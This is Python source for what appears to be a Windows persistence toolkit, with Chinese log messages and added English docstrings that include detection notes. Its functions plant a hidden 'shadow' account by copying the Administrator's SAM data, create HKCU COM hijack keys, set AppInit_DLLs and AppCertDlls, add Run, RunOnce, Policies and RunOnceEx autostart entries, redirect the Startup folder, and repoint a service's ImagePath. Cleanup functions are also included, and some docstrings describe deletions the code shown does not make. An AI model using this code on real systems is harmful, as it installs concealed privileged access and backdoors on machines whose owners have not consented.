def set_account(username,password):
    """Create *username* and rewrite its raw SAM keys so it mirrors the built-in Administrator.

    Sequence: create the account through ``create_accout``, look up its RID,
    read the Administrator's SAM ``F`` blob plus the account's own ``V`` blob,
    delete the account through ``delete_accout``, then re-create the two SAM
    keys by hand.  Presumably the point is an account that keeps working but
    no longer shows up in normal user enumeration ("shadow account") — that
    intent is inferred from the log text, not demonstrated here.

    Defensive notes: nothing legitimate writes directly under
    ``HKLM\\SAM\\SAM\\Domains\\Account\\Users``, and account creation followed
    immediately by deletion of the same name is an unusual pairing; both are
    straightforward to alert on with registry/security-log auditing.  The SAM
    hive is normally only accessible to SYSTEM, so this must already run with
    that level of privilege.  ``clear_account`` is the inverse.

    Args:
        username: Name of the account to create and shadow.
        password: Passed through to ``create_accout``.

    Returns:
        None.  Logs an error and returns early when the account's SAM key
        cannot be opened.
    """

    create_accout(username,password)

    # The account's RID.  The author calls it "account_type" because the SAM
    # stores the RID in the *type* field of the Names entry (see get_account_num).
    account_type = get_account_num(username)

    root = pyregedit.HKEY_LOCAL_MACHINE
    # hex() gives '0x1f4'; [2:] strips the prefix and '00000' pads it.  This
    # yields the 8-character key name only for a 3-hex-digit RID — TODO confirm
    # behaviour for RIDs >= 0x1000.  Note the raw string ends in a doubled
    # backslash, so the path literally contains 'Users\\00000...'.
    path = r"SAM\SAM\Domains\Account\Users\\"+'00000'+str(hex(account_type))[2:]
    reg = pyregedit.RegEdit(root,path)

    # Bail out if the key does not exist (or cannot be opened).
    if reg.check_key():
        # NOTE(review): get_admin_account_value() returns None when the
        # Administrator key is unavailable; that None is written unchecked
        # as the 'F' data below.
        admin_F = get_admin_account_value()
        # Keep the account's own V blob; it is restored verbatim after the delete.
        V = reg.get_value("V")[0]
        # ForcePasswordReset = reg.get_value("ForcePasswordReset")[0]
        # SupplementalCredentials = reg.get_value("SupplementalCredentials")[0]
    else:
        logger.error("用户不存在")
        return

    delete_accout(username)

    # Re-create the RID key: Administrator's F blob, the account's own V blob.
    reg.create_value("F",pyregedit.REG_BINARY,admin_F)
    reg.create_value("V",pyregedit.REG_BINARY,V)
    # reg.create_value("ForcePasswordReset",pyregedit.REG_BINARY,ForcePasswordReset)
    # reg.create_value("SupplementalCredentials",pyregedit.REG_BINARY,SupplementalCredentials)

    # Re-create the Names entry: an unnamed value whose *type* is the RID and
    # whose data is empty, matching how get_account_num reads it back.
    path = r"SAM\SAM\Domains\Account\Users\Names\\" + username
    reg = pyregedit.RegEdit(root, path)
    reg.create_value("", account_type, "".encode())

    logger.info('影子账号创建成功')
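def _delete_hklm_startup_value(path, label):
    """Delete the ``Startup`` value under HKLM\\*path*, logging the outcome with *label*.

    Args:
        path: Subkey path below HKLM that holds the ``Startup`` value.
        label: Key name used in the log messages.

    Returns:
        False when the key cannot be opened (so the caller can stop), True
        otherwise — including when the delete itself failed, which is logged.
    """
    reg = pyregedit.RegEdit(pyregedit.HKEY_LOCAL_MACHINE, path)
    if not reg.check_key():
        # check_key() does not separate "missing" from "access denied"; on this
        # always-present Explorer key the usual cause is a non-elevated process.
        logger.error('需要管理员权限!')
        return False
    try:
        reg.delete_value('Startup')
        logger.info(label + ' Startup 清除成功')
    except Exception:
        # Narrowed from a bare ``except`` so KeyboardInterrupt still propagates.
        logger.error(label + ' Startup 清除失败')
    return True


def clear_system_startup_folder():
    """Remove a redirected ``Startup`` value from the machine-wide Explorer shell-folder keys.

    Inverse of ``set_system_startup_folder_shell``: deletes the ``Startup``
    value from both ``User Shell Folders`` and ``Shell Folders`` under HKLM.
    Stops at the first key that cannot be opened.  Must run elevated.
    """
    base = r"Software\Microsoft\Windows\CurrentVersion\Explorer"
    if not _delete_hklm_startup_value(base + r"\User Shell Folders", 'User Shell Folders'):
        return
    _delete_hklm_startup_value(base + r"\Shell Folders", 'Shell Folders')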
def init():
    """Ensure the per-user CLSID key {b5f8350b-…} and its ``InprocServer32`` subkey exist.

    Creates whichever of the two keys is missing under
    ``HKCU\\Software\\Classes\\CLSID`` and returns a handle on
    ``InprocServer32`` — the subkey whose default value tells COM which DLL
    to load for the CLSID.  Nothing is written to that value here.

    Defensive note: a CLSID registered under HKCU\\Software\\Classes that also
    has an HKLM registration is the standard per-user COM hijack indicator;
    alerting on key creation under that path catches it.  ``clear_com_Hijack``
    removes these keys.

    Returns:
        pyregedit.RegEdit positioned on the ``InprocServer32`` subkey.
    """
    root = pyregedit.HKEY_CURRENT_USER
    path = r"Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}"
    reg = pyregedit.RegEdit(root, path)
    if reg.check_key():
        # CLSID key already present; only the subkey may be missing.
        path = r"Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InprocServer32"
        reg = pyregedit.RegEdit(root, path)
        if reg.check_key():
            pass
        else:
            reg.create_key()
            logger.info('创建了InprocServer32')
    else:
        # Neither key exists: create the CLSID key, then the subkey.
        reg.create_key()
        path = r"Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InprocServer32"
        reg = pyregedit.RegEdit(root, path)
        reg.create_key()
        logger.info('创建了InprocServer32')
    # Both branches leave `reg` on InprocServer32.
    return reg
def init():
    """Ensure the per-user CLSID key {42aedc87-…} and its ``InprocServer32`` subkey exist.

    Same logic as the {b5f8350b-…} variant: create the missing key(s) under
    ``HKCU\\Software\\Classes\\CLSID`` and return a handle on
    ``InprocServer32``.  The default value of that subkey (not written here)
    is what COM consults for the DLL path.

    Defensive note: HKCU CLSID entries override the HKLM registration for a
    standard-user process, so their appearance for a CLSID that Explorer uses
    is a high-signal event.  ``clear_com_explorer_Hijack`` removes these keys.

    Returns:
        pyregedit.RegEdit positioned on the ``InprocServer32`` subkey.
    """
    root = pyregedit.HKEY_CURRENT_USER
    path = r"Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}"
    reg = pyregedit.RegEdit(root, path)
    if reg.check_key():
        # CLSID key already present; only the subkey may be missing.
        path = r"Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InprocServer32"
        reg = pyregedit.RegEdit(root, path)
        if reg.check_key():
            pass
        else:
            reg.create_key()
            logger.info('创建了InprocServer32')
    else:
        # Neither key exists: create the CLSID key, then the subkey.
        reg.create_key()
        path = r"Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InprocServer32"
        reg = pyregedit.RegEdit(root, path)
        reg.create_key()
        logger.info('创建了InprocServer32')
    # Both branches leave `reg` on InprocServer32.
    return reg
def clear_AppCertDlls():
    """Remove the whole ``AppCertDlls`` key under HKLM Session Manager.

    Counterpart of ``set_AppCertDlls``.  Deletes the entire key rather than
    only the ``Default`` value that the setter writes, so any other entries
    under it go too.  Logs and does nothing when the key is absent.  Needs
    to run elevated.
    """
    key_path = r"System\CurrentControlSet\Control\Session Manager\AppCertDlls"
    editor = pyregedit.RegEdit(pyregedit.HKEY_LOCAL_MACHINE, key_path)
    if not editor.check_key():
        logger.info('AppCertDlls键不存在')
        return
    editor.delete_current_key()
    logger.info('清除')
def get_admin_account_value():
    """Return the raw SAM ``F`` blob of the built-in Administrator account (RID 0x1F4 = 500).

    Reads ``HKLM\\SAM\\SAM\\Domains\\Account\\Users\\000001F4``; the SAM hive
    is normally accessible only to SYSTEM, so this returns None from a
    non-SYSTEM process as well as when the key is genuinely missing.  Used by
    ``set_account``, which writes the blob over another account's ``F`` value.

    Defensive note: any read of the SAM hive by a user-mode tool is itself an
    indicator worth alerting on.

    Returns:
        The ``F`` value's data (first element of ``get_value``), or None.
    """
    root = pyregedit.HKEY_LOCAL_MACHINE
    path = r"SAM\SAM\Domains\Account\Users\000001F4"
    reg = pyregedit.RegEdit(root,path)

    # Bail out if the key does not exist (or cannot be opened).
    if reg.check_key():
        F = reg.get_value("F")[0]
        # V = reg.get_value("V")[0]
        return F
    else:
        return
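def _delete_sam_key_logged(root, path):
    """Delete the key at *root*\\*path*; log (rather than silently swallow) a failure.

    Args:
        root: pyregedit root hive constant.
        path: Key path to delete.

    Returns:
        True when ``delete_current_key`` succeeded, False when it raised.
    """
    reg = pyregedit.RegEdit(root, path)
    try:
        reg.delete_current_key()
    except Exception as e:
        # Was a bare ``except: pass``.  A missing key is expected after a
        # partial earlier cleanup, so this stays best-effort, but the reason
        # is now visible in the log instead of being hidden.
        logger.error('删除 ' + path + ' 失败: ' + str(e))
        return False
    return True


def clear_account(username):
    """Delete the raw SAM keys that ``set_account`` created for *username*.

    Resolves the RID through ``get_account_num`` and removes both the
    ``Users\\Names\\<username>`` key and the ``Users\\0000<RID>`` key.
    Requires access to the SAM hive (normally SYSTEM).

    Caution: the only precondition checked is that a ``Names`` entry exists,
    which is true for every local account.  Passed the name of a legitimate
    account, this deletes that account's SAM keys — callers must confirm the
    name refers to the shadow account first.

    Args:
        username: Account name whose SAM keys are removed.
    """
    account_type = get_account_num(username)
    if not account_type:
        logger.info("未植入影子后门")
        return

    root = pyregedit.HKEY_LOCAL_MACHINE
    # Both raw strings end in a doubled backslash, so the paths literally
    # contain 'Names\\<user>' and 'Users\\00000…' — kept identical to
    # set_account so the same keys are addressed.
    names_path = r"SAM\SAM\Domains\Account\Users\Names\\" + username
    # Same key-name construction as set_account: '0x' stripped, '00000' prefix.
    rid_path = r"SAM\SAM\Domains\Account\Users\\" + '00000' + str(hex(account_type))[2:]

    names_ok = _delete_sam_key_logged(root, names_path)
    rid_ok = _delete_sam_key_logged(root, rid_path)

    # Previously reported success unconditionally, even when both deletes failed.
    if names_ok and rid_ok:
        logger.info("影子账号清除成功")
    else:
        logger.error("影子账号清除未完成")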
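def clear_AppInit_DLLs():
    """Blank the ``AppInit_DLLs`` list and set ``LoadAppInit_DLLs`` to 0 under HKLM Windows NT\\Windows.

    Counterpart of ``set_AppInit_DLLs``.  Note this empties the whole DLL list,
    not just the entry the setter added, so any pre-existing legitimate entry
    is lost as well.  Needs to run elevated.
    """
    root = pyregedit.HKEY_LOCAL_MACHINE
    path = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
    reg = pyregedit.RegEdit(root,path)

    # This key always exists, so a failed check_key() almost certainly means
    # the process is not elevated.
    if not reg.check_key():
        logger.info('需要管理员权限!')
        return

    try:
        reg.create_value('AppInit_DLLs', pyregedit.REG_SZ, "")
        reg.create_value('LoadAppInit_DLLs', pyregedit.REG_DWORD, 0x0)
        logger.info('清除')
    except Exception as e:
        # set_AppInit_DLLs guards its writes; the clear path previously let an
        # access-denied error propagate unlogged.
        logger.error('清除 AppInit_DLLs 失败: ' + str(e))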
def get_account_num(username):
    """Return the RID recorded for *username* in the SAM ``Users\\Names`` key, or None.

    The SAM keeps the RID in the *type* field of the Names entry's unnamed
    default value, which is why the second element of ``get_value("")`` is
    returned.  None is returned when the key is missing or cannot be opened
    (the SAM hive is normally readable only by SYSTEM).

    Args:
        username: Local account name to look up.
    """
    # The raw string ends in a doubled backslash, so the path literally
    # contains 'Names\\<user>'; kept as the rest of the module does it.
    names_key = r"SAM\SAM\Domains\Account\Users\Names\\"+username
    editor = pyregedit.RegEdit(pyregedit.HKEY_LOCAL_MACHINE, names_key)
    if not editor.check_key():
        return None
    # Index 1 is the value type, which for Names entries carries the RID.
    return editor.get_value("")[1]
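def _hkcu_delete_run_value(path, label):
    """Delete the module-level *value_name* from HKCU\\*path*, logging with *label*.

    A missing key is silently skipped; a False return from ``delete_value``
    is reported as "not planted"; any exception is logged, not propagated.
    """
    reg = pyregedit.RegEdit(pyregedit.HKEY_CURRENT_USER, path)
    if not reg.check_key():
        return
    try:
        if reg.delete_value(value_name):
            logger.info(label + ' 删除成功')
        else:
            logger.error('没有植入' + label + ' 后门')
    except Exception:
        # Narrowed from a bare ``except``.
        logger.error(label + ' 删除失败')


def _hkcu_delete_run_key(path, label):
    """Delete the whole HKCU\\*path* key if it exists, logging with *label*."""
    reg = pyregedit.RegEdit(pyregedit.HKEY_CURRENT_USER, path)
    if not reg.check_key():
        return
    try:
        reg.delete_current_key()
        logger.info(label + ' 删除成功')
    except Exception:
        logger.error(label + ' 删除失败')


def clear_user():
    """Remove the per-user autostart entries written by the ``set_user_*`` functions.

    Deletes *value_name* from HKCU ``Run`` and ``RunOnce`` and removes the
    ``RunServices`` / ``RunServicesOnce`` keys outright (those keys are not
    part of a typical modern default install, so ``set_user_RunServicesOnce``
    creating one is itself the indicator).  Uses the module-level ``value_name``.
    """
    base = r"Software\Microsoft\Windows\CurrentVersion"
    _hkcu_delete_run_value(base + r"\Run", 'Run')
    # RunOnce was previously hit with delete_value() and no check_key()/try,
    # so a missing key raised out of the function.
    _hkcu_delete_run_value(base + r"\RunOnce", 'RunOnce')
    _hkcu_delete_run_key(base + r"\RunServices", 'RunServices')
    _hkcu_delete_run_key(base + r"\RunServicesOnce", 'RunServicesOnce')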
def set_user_startup_folder_shell(startup_path):
    """Point the current user's ``Startup`` shell folder at *startup_path*.

    Writes ``Startup`` (REG_SZ) under HKCU ``Explorer\\Shell Folders``, creating
    the key if it is missing.  The effect is that the shell treats
    *startup_path* as the per-user Startup folder, so its contents run at
    logon.  Defensive note: a ``Startup`` shell-folder value that no longer
    points under ``%APPDATA%\\Microsoft\\Windows\\Start Menu`` is a simple,
    high-signal check; ``clear_user_startup_folder`` restores the default.

    Args:
        startup_path: Directory to register as the Startup folder.
    """
    root = pyregedit.HKEY_CURRENT_USER
    path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
    reg = pyregedit.RegEdit(root, path)
    if reg.check_key():
        pass
    else:
        reg.create_key()

    try:
        reg.create_value('Startup', pyregedit.REG_SZ, startup_path)
        logger.info('Shell Folders Startup 修改成功')
    except:
        # Bare except: also swallows KeyboardInterrupt/SystemExit.
        logger.error('Shell Folders Startup 修改失败')
def set_system_startup_folder_shell(startup_path):
    """Write a ``Startup`` value into the machine-wide HKLM ``Explorer\\Shell Folders`` key.

    Unlike the HKCU variant the key is never created: if it cannot be opened
    the function logs a privilege error and returns.  Requires elevation.
    Defensive note: ``Startup`` is not one of the values normally present under
    the HKLM ``Shell Folders`` key, so its mere presence is an indicator;
    ``clear_system_startup_folder`` deletes it.

    Args:
        startup_path: Directory to register as the Startup folder.
    """
    root = pyregedit.HKEY_LOCAL_MACHINE
    path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
    reg = pyregedit.RegEdit(root, path)
    if reg.check_key():
        pass
    else:
        # check_key() failing on this always-present key means no admin rights.
        logger.error('需要管理员权限!')
        return
    try:
        reg.create_value('Startup', pyregedit.REG_SZ, startup_path)
        logger.info('Shell Folders Startup 修改成功')
    except:
        # Bare except: also swallows KeyboardInterrupt/SystemExit.
        logger.error('Shell Folders Startup 修改失败')
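def _restore_hkcu_startup_value(path, value_type, value, label):
    """Write *value* as the ``Startup`` value of HKCU\\*path*, logging with *label*.

    Args:
        path: Explorer shell-folder subkey below HKCU.
        value_type: pyregedit value type constant to write with.
        value: Startup folder path to store.
        label: Key name used in the log messages.
    """
    reg = pyregedit.RegEdit(pyregedit.HKEY_CURRENT_USER, path)
    if not reg.check_key():
        logger.info(label + ' 键值不存在')
        return
    try:
        reg.create_value('Startup', value_type, value)
        logger.info(label + ' Startup 清除成功')
    except Exception:
        # Narrowed from a bare ``except``.
        logger.error(label + ' Startup 清除失败')


def clear_user_startup_folder():
    """Restore the per-user ``Startup`` shell folder to its Windows default location.

    Counterpart of ``set_user_startup_folder_shell``.  ``User Shell Folders``
    holds the unexpanded ``%USERPROFILE%`` form and is REG_EXPAND_SZ on a
    default install, so that type is written explicitly instead of the REG_SZ
    the original used (which relies on the shell expanding a REG_SZ).
    ``Shell Folders`` holds the expanded absolute path, so the variable is
    expanded before writing.  Both keys are created by Windows; a missing key
    is logged, not created.
    """
    value = r'%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'
    base = r"Software\Microsoft\Windows\CurrentVersion\Explorer"
    _restore_hkcu_startup_value(
        base + r"\User Shell Folders", pyregedit.REG_EXPAND_SZ, value, 'User Shell Folders')
    # `os` is already imported by this module (used by clear_com_Hijack).
    _restore_hkcu_startup_value(
        base + r"\Shell Folders", pyregedit.REG_SZ, os.path.expandvars(value), 'Shell Folders')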
def set_user_runonce(cmd):
    """Register *cmd* under HKCU ``RunOnce`` using the module-level ``value_name``.

    RunOnce entries are executed (and removed) by the shell at the next logon
    of this user.  Defensive note: per-user Run/RunOnce writes are a standard
    autostart audit point; ``clear_user`` deletes this value.

    Args:
        cmd: Command line stored as the REG_SZ value.

    Side effects:
        Calls ``exit(0)`` — terminating the whole interpreter — when the
        ``RunOnce`` key cannot be opened.  NOTE(review): a library function
        should return or raise instead; callers have no way to recover.
    """
    root = pyregedit.HKEY_CURRENT_USER
    path = r"Software\Microsoft\Windows\CurrentVersion\RunOnce"
    reg = pyregedit.RegEdit(root, path)

    if reg.check_key():
        try:
            reg.create_value(value_name, pyregedit.REG_SZ, cmd)
            logger.info('插入注册表成功')
        except:
            # Bare except: also swallows KeyboardInterrupt/SystemExit.
            logger.error('插入注册表失败')
    else:
        # The key is never created here (comment left by the author says "create key").
        logger.error('RunOnce 键不存在')
        exit(0)
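def clear_com_explorer_Hijack():
    """Delete the per-user CLSID override for {42aedc87-…} that the matching ``init`` creates.

    Removes the ``InprocServer32`` subkey and then the CLSID key itself under
    ``HKCU\\Software\\Classes\\CLSID``.  For a standard-user process the HKCU
    entry shadows the HKLM registration of the same CLSID, so removing it
    puts the machine-wide registration back in effect.
    """
    root = pyregedit.HKEY_CURRENT_USER
    path = r"Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}"
    reg = pyregedit.RegEdit(root, path)

    if not reg.check_key():
        logger.info('该后门没有植入')
        return

    try:
        # Subkey first: deleting a non-empty key is expected to fail.
        reg.delete_sub_key('InprocServer32')
        reg.delete_current_key()
        logger.info('清除成功')
    except Exception as e:
        # Narrowed from a bare ``except``; the reason makes a partial removal
        # (subkey gone, parent left behind) diagnosable.
        logger.error('清除失败: ' + str(e))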
def set_AppInit_DLLs(cmd):
    """Write *cmd* into ``AppInit_DLLs`` and set ``LoadAppInit_DLLs`` to 1 under HKLM Windows NT\\Windows.

    Overwrites the whole ``AppInit_DLLs`` string (any existing entries are
    replaced).  Requires elevation; when the key cannot be opened it logs a
    privilege message and returns.  Defensive note: ``LoadAppInit_DLLs``
    flipping to 1, or any change to ``AppInit_DLLs``, is a well-known,
    low-noise alert; ``clear_AppInit_DLLs`` reverts both values.

    Args:
        cmd: Value stored as the REG_SZ ``AppInit_DLLs`` data.
    """
    root = pyregedit.HKEY_LOCAL_MACHINE
    path = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
    reg = pyregedit.RegEdit(root,path)

    # Bail out if the key cannot be opened (always present; failure means no admin rights).
    if reg.check_key():
        try:
            reg.create_value('AppInit_DLLs', pyregedit.REG_SZ, cmd)
            reg.create_value('LoadAppInit_DLLs', pyregedit.REG_DWORD, 0x01)
            logger.info('插入注册表成功')
        except:
            # Bare except: also swallows KeyboardInterrupt/SystemExit.
            logger.error('插入注册表失败')
    else:
        logger.info('需要管理员权限!')
        return
def set_user_RunServicesOnce(cmd):
    """Register *cmd* under HKCU ``RunServicesOnce`` using the module-level ``value_name``.

    Creates the key when it is missing.  Defensive note: this key is not part
    of a typical modern default install, so its creation under HKCU is itself
    an indicator independent of the value written; ``clear_user`` deletes the
    whole key.

    Args:
        cmd: Command line stored as the REG_SZ value.
    """
    root = pyregedit.HKEY_CURRENT_USER
    path = r"Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"
    reg = pyregedit.RegEdit(root, path)

    if reg.check_key():
        pass
    else:
        reg.create_key()
        # NOTE(review): logged at error level although it is a normal creation message.
        logger.error('创建 RunServicesOnce 键值')

    try:
        reg.create_value(value_name, pyregedit.REG_SZ, cmd)
        logger.info('插入注册表成功')
    except:
        # Bare except: also swallows KeyboardInterrupt/SystemExit.
        logger.error('插入注册表失败')
def set_system_Explorer(cmd):
    """Register *cmd* under HKLM ``Policies\\Explorer\\Run`` using the module-level ``value_name``.

    Creates the key when it is missing (this needs elevation; a failure there
    propagates, unlike the HKCU variant which catches it).  Defensive note:
    the Policies ``Explorer\\Run`` key is normally populated only by Group
    Policy, so writes from anything other than the policy engine stand out;
    ``clear_system`` deletes the whole key.

    Args:
        cmd: Command line stored as the REG_SZ value.
    """
    root = pyregedit.HKEY_LOCAL_MACHINE
    path = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
    reg = pyregedit.RegEdit(root, path)

    if reg.check_key():
        pass
    else:
        reg.create_key()
        # NOTE(review): error level for a normal creation message, and the
        # non-raw literal contains '\R', an unrecognised escape that Python keeps
        # literally (with a warning on newer versions).  Left untouched here.
        logger.error('创建 Explorer\Run 键值')

    try:
        reg.create_value(value_name, pyregedit.REG_SZ, cmd)
        logger.info('插入注册表成功')
    except:
        # Bare except: also swallows KeyboardInterrupt/SystemExit.
        logger.error('插入注册表失败')
def set_system_RunOnceEx_dll(cmd):
    """Register *cmd* under HKLM ``RunOnceEx\\0001\\Depend`` using the module-level ``value_name``.

    Creates the key path when it is missing (requires elevation; a failure
    there propagates).  Defensive note: ``RunOnceEx`` is rarely populated
    outside of setup scenarios, so a new ``0001\\Depend`` subtree is a
    low-noise indicator; ``clear_system`` removes ``Depend`` and ``0001``.

    Args:
        cmd: Value stored as REG_SZ data.
    """
    root = pyregedit.HKEY_LOCAL_MACHINE
    path = r"Software\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend"
    reg = pyregedit.RegEdit(root, path)

    if reg.check_key():
        pass
    else:
        reg.create_key()
        # NOTE(review): error level for a normal creation message.
        logger.error(r'创建 RunOnceEx\0001\Depend 键值')

    try:
        reg.create_value(value_name, pyregedit.REG_SZ, cmd)
        logger.info('插入注册表成功')
    except:
        # Bare except: also swallows KeyboardInterrupt/SystemExit.
        logger.error('插入注册表失败')
def set_AppCertDlls(cmd):
    """Write *cmd* as a value literally named ``Default`` under HKLM Session Manager ``AppCertDlls``.

    Creates the ``AppCertDlls`` key when it is missing (requires elevation; a
    failure there propagates).  Note that ``'Default'`` is a named value, not
    the key's unnamed default value.  Defensive note: the ``AppCertDlls`` key
    does not exist on a default install, so its creation alone is a reliable
    alert; ``clear_AppCertDlls`` deletes the whole key.

    Args:
        cmd: Value stored as REG_SZ data.
    """
    root = pyregedit.HKEY_LOCAL_MACHINE
    path = r"System\CurrentControlSet\Control\Session Manager\AppCertDlls"
    reg = pyregedit.RegEdit(root, path)

    # Create the key if it does not exist.
    if reg.check_key():
        pass
    else:
        reg.create_key()
        logger.info('创建AppCertDlls键')

    try:
        reg.create_value('Default', pyregedit.REG_SZ, cmd)
        logger.info('插入注册表成功')
    except:
        # Bare except: also swallows KeyboardInterrupt/SystemExit.
        logger.error('插入注册表失败')
def set_user_Explorer(cmd):
    """Register *cmd* under HKCU ``Policies\\Explorer\\Run`` using the module-level ``value_name``.

    Creates the key when it is missing; a failure to create it is logged as a
    privilege problem and the function returns.  Defensive note: the per-user
    Policies ``Explorer\\Run`` key is normally written only by Group Policy,
    so any other writer stands out; ``clear_system`` deletes the whole key.

    Args:
        cmd: Command line stored as the REG_SZ value.
    """
    root = pyregedit.HKEY_CURRENT_USER
    path = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
    reg = pyregedit.RegEdit(root, path)

    if reg.check_key():
        pass
    else:
        try:
            reg.create_key()
            # NOTE(review): non-raw literal contains '\R', an unrecognised escape
            # kept literally by Python (with a warning on newer versions).
            logger.info('创建 Explorer\Run 键值')
        except:
            # Bare except: also swallows KeyboardInterrupt/SystemExit.
            logger.error('需要管理员权限')
            return
    try:
        reg.create_value(value_name, pyregedit.REG_SZ, cmd)
        logger.info('插入注册表成功')
    except:
        logger.error('插入注册表失败')
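def clear_com_Hijack():
    """Delete the per-user CLSID override for {b5f8350b-…} and the payload directory.

    Removes ``InprocServer32`` and then the CLSID key under
    ``HKCU\\Software\\Classes\\CLSID``, then recursively deletes the directory
    named by the module-level ``defaultpath`` if it exists.  Because that
    deletion is unconditional, ``defaultpath`` must point only at the payload
    location.  Nothing is done when the CLSID key is absent.
    """
    root = pyregedit.HKEY_CURRENT_USER
    path = r"Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}"
    reg = pyregedit.RegEdit(root, path)

    if not reg.check_key():
        logger.info('该后门没有植入')
        return

    try:
        # Subkey first: deleting a non-empty key is expected to fail.
        reg.delete_sub_key('InprocServer32')
        reg.delete_current_key()
        if os.path.isdir(defaultpath):
            shutil.rmtree(defaultpath)
        logger.info('清除成功')
    except Exception as e:
        # Narrowed from a bare ``except``; the reason distinguishes a registry
        # failure from a file-system one.
        logger.error('清除失败: ' + str(e))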
def set_system(cmd):
    """Register *cmd* under HKLM ``Run`` using the module-level ``value_name``.

    The key is never created; if it cannot be opened (it always exists, so
    this means the process is not elevated) a privilege error is logged and
    the function returns.  Defensive note: HKLM ``Run`` is the most routinely
    audited autostart location; ``clear_system`` deletes this value.

    Args:
        cmd: Command line stored as the REG_SZ value.
    """

    root = pyregedit.HKEY_LOCAL_MACHINE
    path = r"Software\Microsoft\Windows\CurrentVersion\Run"
    reg = pyregedit.RegEdit(root, path)

    # Bail out if the key cannot be opened.
    if reg.check_key():
        # NOTE(review): `key` is assigned but never used.
        key = reg.get_key()
    else:
        logger.error('需要管理员权限!')
        return

    try:
        reg.create_value(value_name, pyregedit.REG_SZ, cmd)
        logger.info('插入注册表成功')
    except:
        # Bare except: also swallows KeyboardInterrupt/SystemExit.
        logger.error('插入注册表失败')
def set_reg_service(cmd, service):
    """Repoint an existing service's ``ImagePath`` at *cmd* and make it auto-start.

    Writes ``Start=2`` (automatic), ``Type=0x10`` (own-process Win32 service)
    and ``ImagePath=cmd`` (REG_EXPAND_SZ) under
    ``HKLM\\SYSTEM\\CurrentControlSet\\Services\\<service>``.  The service
    must already exist; otherwise an error is logged and nothing is written.
    Requires elevation.  Defensive note: an ``ImagePath`` change on an
    existing service is one of the highest-signal registry events available
    and is cheap to audit; there is no matching clear function on this page.

    Args:
        cmd: New binary path / command line for the service.
        service: Name of the existing service key to modify.
    """

    root = pyregedit.HKEY_LOCAL_MACHINE
    # Raw string ends in a doubled backslash, so the path literally contains
    # 'Services\\<service>'.
    path = r"SYSTEM\CurrentControlSet\Services\\" + service
    reg = pyregedit.RegEdit(root, path)

    # Bail out if the service key does not exist.
    if reg.check_key():
        # NOTE(review): `key` is assigned but never used.
        key = reg.get_key()
    else:
        logger.error(service + '服务不存在')
        return

    try:
        # reg.create_value('ErrorControl',pyregedit.REG_DWORD,0x01)
        # reg.create_value('ObjectName',pyregedit.REG_SZ,'LocalSystem')
        reg.create_value('Start', pyregedit.REG_DWORD, 0x02)
        reg.create_value('Type', pyregedit.REG_DWORD, 0x10)
        reg.create_value('ImagePath', pyregedit.REG_EXPAND_SZ, cmd)
        logger.info('修改服务成功')
    except Exception as e:
        logger.error('修改服务失败: ' + str(e))
def HKLM_init():
    """Return a RegEdit handle on the HKLM ``Winlogon`` key.

    Only opens the handle; nothing is read or written here.  (This is the
    key that holds the ``Userinit`` / ``Shell`` logon values, a standard
    persistence audit point.)
    """
    return pyregedit.RegEdit(
        pyregedit.HKEY_LOCAL_MACHINE,
        r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon",
    )
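def _clear_system_delete_value(root, path, label):
    """Delete the module-level *value_name* from *root*\\*path*, logging with *label*.

    Returns:
        False when the key cannot be opened, True otherwise (a failed delete
        is logged, not raised).
    """
    reg = pyregedit.RegEdit(root, path)
    if not reg.check_key():
        return False
    try:
        if reg.delete_value(value_name):
            logger.info(label + ' 删除成功')
        else:
            logger.error('没有植入' + label + ' 后门')
    except Exception:
        # Narrowed from a bare ``except``.
        logger.error(label + ' 删除失败')
    return True


def _clear_system_delete_key(root, path, label, missing_msg=None, sub_key=None):
    """Delete the key *root*\\*path* (deleting *sub_key* first if given), logging with *label*.

    Args:
        root: pyregedit root hive constant.
        path: Key to delete.
        label: Key name used in the log messages.
        missing_msg: Logged at error level when the key is absent; silent if None.
        sub_key: Child key to remove first so the parent delete can succeed.
    """
    reg = pyregedit.RegEdit(root, path)
    if not reg.check_key():
        if missing_msg:
            logger.error(missing_msg)
        return
    try:
        if sub_key:
            try:
                reg.delete_sub_key(sub_key)
                logger.info(label + '\\' + sub_key + ' 删除成功')
            except Exception:
                # The child may already be gone; still attempt the parent.
                pass
        reg.delete_current_key()
        logger.info(label + ' 删除成功')
    except Exception:
        logger.error(label + ' 删除失败')


def clear_system():
    """Remove the machine-wide autostart entries written by the ``set_system*`` functions.

    Deletes *value_name* from HKLM ``Run`` / ``RunOnce``, then removes the
    whole ``RunServices``, ``RunServicesOnce``, ``Policies\\Explorer\\Run`` and
    ``RunOnceEx\\0001`` (with ``Depend``) keys under HKLM, and finally the HKCU
    ``Policies\\Explorer\\Run`` key.  Deleting the Policies keys outright also
    drops any Group-Policy-managed entries in them.  Returns early when HKLM
    ``Run`` cannot be opened, which in practice means the process is not
    elevated.  Uses the module-level ``value_name``.
    """
    hklm = pyregedit.HKEY_LOCAL_MACHINE
    hkcu = pyregedit.HKEY_CURRENT_USER
    base = r"Software\Microsoft\Windows\CurrentVersion"

    if not _clear_system_delete_value(hklm, base + r"\Run", 'Run'):
        logger.error('Run 需要管理员权限!')
        return
    # RunOnce was previously hit with delete_value() and no check_key()/try.
    _clear_system_delete_value(hklm, base + r"\RunOnce", 'RunOnce')
    _clear_system_delete_key(hklm, base + r"\RunServices", 'RunServices')
    _clear_system_delete_key(hklm, base + r"\RunServicesOnce", 'RunServicesOnce')
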